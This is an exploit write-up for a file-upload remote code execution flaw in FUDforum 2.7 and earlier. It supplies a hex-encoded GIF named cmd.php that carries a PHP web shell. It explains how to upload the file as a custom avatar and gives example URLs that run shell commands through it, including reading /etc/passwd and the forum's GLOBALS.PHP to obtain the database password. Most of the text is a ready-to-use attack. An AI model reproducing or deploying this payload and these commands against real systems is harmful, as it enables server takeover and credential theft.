<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">FUDforum <= 2.7 remote (based on http://www.securityfocus.com/bid/14678...)

no need for code:

I create a malformed gif (to bypass image format check...),
called cmd.php, this an hexadecimal dump of the file...


47 49 46 38 39 61 09 00 0C 00 80 00 00 FF 00 00
FF FF FF 21 F9 04 01 3C 3F 70 68 70 20 73 79 73
74 65 6D 28 24 48 54 54 50 5F 47 45 54 5F 56 41
52 53 5B 63 6D 64 5D 29 3B 20 3F 3E 00 00 01 00
2C 00 00 00 00 09 00 0C 00 00 02 14 8C 8F 01 90
B6 9C 1E 3C 72 AA 4A B1 93 88 F7 D5 80 CD 58 00
00 3B

inside you have:

<?php system($HTTP_GET_VARS[cmd]); ?>

You can upload this, then retrieve the image url form profile page, usually something
like:

http://[target]/[path]/images/custom_avatars/[something].php


so you call this url in this way:

http://[target]/[path]/images/custom_avatars/[something].php?cmd=[command]%20>%20temp.txt

redirecting the output to a temporary file (if not you will see strange chars on screen)...

examples:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=cat%20/etc/passwd%20>%20temp.txt

than see temp.txt file

or to see database password:

http://[target]/[path]/images/custom_avatars/[something].php?cmd=cat%20../../../FUDforum/include/GLOBALS.PHP%20>%20temp.txt


rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
</span></span>
</code></pre>